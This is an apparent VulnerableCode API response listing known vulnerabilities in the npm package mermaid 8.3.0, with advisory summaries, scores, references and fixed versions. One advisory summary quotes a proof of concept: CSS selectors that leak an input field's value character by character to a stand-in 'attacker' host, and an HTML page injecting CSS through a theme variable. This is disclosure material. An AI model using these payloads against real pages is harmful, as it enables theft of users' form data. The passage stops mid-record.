Lookup for vulnerable packages by Package URL.

GET /api/packages/253999?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/253999?format=api",
    "purl": "pkg:npm/mermaid@8.3.0",
    "type": "npm",
    "namespace": "",
    "name": "mermaid",
    "version": "8.3.0",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "10.9.4",
    "latest_non_vulnerable_version": "11.10.0",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53774?format=api",
            "vulnerability_id": "VCID-6qac-5y2d-akdd",
            "summary": "Possible inject arbitrary `CSS` into the generated graph affecting the container HTML\nAn attacker is able to inject arbitrary `CSS` into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted `CSS` selectors.\n\nThe following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the `value` attribute one character at a time. Whenever there is an actual match, an `http` request will be made by the browser in order to \"load\" a background image that will let an attacker know what's the value of the character.\n\n```css\ninput[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }\n...\ninput[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }\n...\ninput[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }\n...\ninput[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }\n...\ninput[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }\n```\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [example link to repo](http://example.com)\n* Email us at [example email address](mailto:example@example.com)\n## Product\n\nmermaid.js\n\n## Tested Version\n\n[v9.1.1](https://github.com/mermaid-js/mermaid/releases/tag/9.1.1)\n\n## Details\n\n### Issue 1: Multiple CSS Injection (`GHSL-2022-036`)\n\nBy supplying a carefully crafted `textColor` theme variable, an attacker can inject arbitrary `CSS` rules into the document. In the following snippet we can see that `getStyles` does not sanitize any of the theme variables leaving the door open for `CSS` injection.\n\n_Snippet from [src/styles.js](https://github.com/mermaid-js/mermaid/blob/9eae97ddab1b6eca58d2fd4af62357d2f4d8d1f7/src/styles.js#L35):_\n\n```js\nconst getStyles = (type, userStyles, options) => {\n  return ` {\n    font-family: ${options.fontFamily};\n    font-size: ${options.fontSize};\n    fill: ${options.textColor}\n  }\n```\n\nFor example, if we set `textColor` to `\"green;} #target { background-color: crimson }\"` the resulting `CSS` will contain a new selector `#target` that will apply a `crimson` background color to an arbitrary element.\n\n```html\n<html>\n\n<body>\n    <div id=\"target\">\n        <h1>This element does not belong to the SVG but we can style it</h1>\n    </div>\n    <svg id=\"diagram\">\n    </svg>\n\n    <script src=\"https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js\"></script>\n    <script>\n        mermaid.initialize({ startOnLoad: false });\n\n        const graph =\n            `\n            %%{ init: { \"themeVariables\" : { \"textColor\": \"green;} #target { background-color: crimson }\" } } }%%\n            graph TD\n                A[Goose]\n            `\n\n        const diagram = document.getElementById(\"diagram\")\n        const svg = mermaid.render('diagram-svg', graph)\n        diagram.innerHTML = svg\n    </script>\n</body>\n\n</html>\n```\n\nIn the proof of concept above we used the `textColor` variable to inject `CSS`, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:\n\n- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393\n- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35\n\n#### Impact\n\nThis issue may lead to `Information Disclosure` via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.\n\n#### Remediation\n\nEnsure that user input is adequately escaped before embedding it in CSS blocks.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-31108",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46475",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46421",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46474",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46463",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46482",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46535",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46537",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.4647",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.4642",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46479",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46451",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46499",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00235",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46476",
                            "published_at": "2026-04-09T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-31108"
                },
                {
                    "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31108",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31108"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/commit/0ae1bdb61adff1cd485caff8c62ec6b8ac57b225",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:53Z/"
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/commit/0ae1bdb61adff1cd485caff8c62ec6b8ac57b225"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-x3vm-38hw-55wf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:53Z/"
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-x3vm-38hw-55wf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31108",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31108"
                },
                {
                    "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014540",
                    "reference_id": "1014540",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014540"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x3vm-38hw-55wf",
                    "reference_id": "GHSA-x3vm-38hw-55wf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x3vm-38hw-55wf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/81322?format=api",
                    "purl": "pkg:npm/mermaid@9.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6qac-5y2d-akdd"
                        },
                        {
                            "vulnerability": "VCID-fwuk-z3uk-1ygf"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@9.1.2"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/720627?format=api",
                    "purl": "pkg:npm/mermaid@9.1.3",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-fwuk-z3uk-1ygf"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@9.1.3"
                }
            ],
            "aliases": [
                "CVE-2022-31108",
                "GHSA-x3vm-38hw-55wf"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6qac-5y2d-akdd"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11926?format=api",
            "vulnerability_id": "VCID-fgz4-kbun-23bn",
            "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nMermaid is a Javascript based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams., malicious diagrams can run javascript code at diagram readers' machines. Users should upgrade to to receive a patch. There are no known workarounds aside from upgrading.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-43861",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65764",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6562",
                            "published_at": "2026-04-01T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65669",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65699",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65664",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65715",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65728",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65749",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65735",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65705",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65741",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65754",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00493",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6574",
                            "published_at": "2026-04-21T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-43861"
                },
                {
                    "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43861",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43861"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/commit/066b7a0d0bda274d94a2f2d21e4323dab5776d83",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/commit/066b7a0d0bda274d94a2f2d21e4323dab5776d83"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/releases/tag/8.13.8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/releases/tag/8.13.8"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43861",
                    "reference_id": "CVE-2021-43861",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43861"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-p3rp-vmj9-gv6v",
                    "reference_id": "GHSA-p3rp-vmj9-gv6v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-p3rp-vmj9-gv6v"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-p3rp-vmj9-gv6v",
                    "reference_id": "GHSA-p3rp-vmj9-gv6v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-p3rp-vmj9-gv6v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/42831?format=api",
                    "purl": "pkg:npm/mermaid@8.13.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6qac-5y2d-akdd"
                        },
                        {
                            "vulnerability": "VCID-fwuk-z3uk-1ygf"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@8.13.8"
                }
            ],
            "aliases": [
                "CVE-2021-43861",
                "GHSA-p3rp-vmj9-gv6v"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fgz4-kbun-23bn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/12356?format=api",
            "vulnerability_id": "VCID-fwuk-z3uk-1ygf",
            "summary": "Prototype pollution vulnerability found in Mermaid's bundled version of DOMPurify\nThe following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.\n\nThis affects the built:\n\n- `dist/mermaid.min.js`\n- `dist/mermaid.js`\n- `dist/mermaid.esm.mjs`\n- `dist/mermaid.esm.min.mjs`\n\nThis will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js`\n\n**Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.**\n\n### Patches\n\n- `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00\n- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34",
            "references": [
                {
                    "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/commit/6c785c93166c151d27d328ddf68a13d9d65adc00",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/commit/6c785c93166c151d27d328ddf68a13d9d65adc00"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/commit/92a07ffe40aab2769dd1c3431b4eb5beac282b34",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/commit/92a07ffe40aab2769dd1c3431b4eb5beac282b34"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-m4gq-x24j-jpmf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-m4gq-x24j-jpmf"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m4gq-x24j-jpmf",
                    "reference_id": "GHSA-m4gq-x24j-jpmf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m4gq-x24j-jpmf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/43983?format=api",
                    "purl": "pkg:npm/mermaid@10.9.3",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-q79q-8yzx-p3f6"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@10.9.3"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/570776?format=api",
                    "purl": "pkg:npm/mermaid@11.0.0-alpha.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-q79q-8yzx-p3f6"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@11.0.0-alpha.1"
                }
            ],
            "aliases": [
                "GHSA-m4gq-x24j-jpmf"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fwuk-z3uk-1ygf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36589?format=api",
            "vulnerability_id": "VCID-x94b-cysu-4fbe",
            "summary": "Cross-site Scripting in Mermaid\nMermaid before 8.11.0 allows XSS when the antiscript feature is used.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-35513",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53886",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53854",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53905",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53904",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.5395",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53933",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53916",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53954",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.5396",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53941",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53907",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53919",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53832",
                            "published_at": "2026-04-01T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.53851",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00307",
                            "scoring_system": "epss",
                            "scoring_elements": "0.5388",
                            "published_at": "2026-04-04T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-35513"
                },
                {
                    "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35513",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35513"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/issues/2122",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/issues/2122"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/pull/2123",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/pull/2123"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e"
                },
                {
                    "reference_url": "https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35513",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35513"
                },
                {
                    "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=990449",
                    "reference_id": "990449",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=990449"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4f6x-49g2-99fm",
                    "reference_id": "GHSA-4f6x-49g2-99fm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4f6x-49g2-99fm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/74520?format=api",
                    "purl": "pkg:npm/mermaid@8.11.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6qac-5y2d-akdd"
                        },
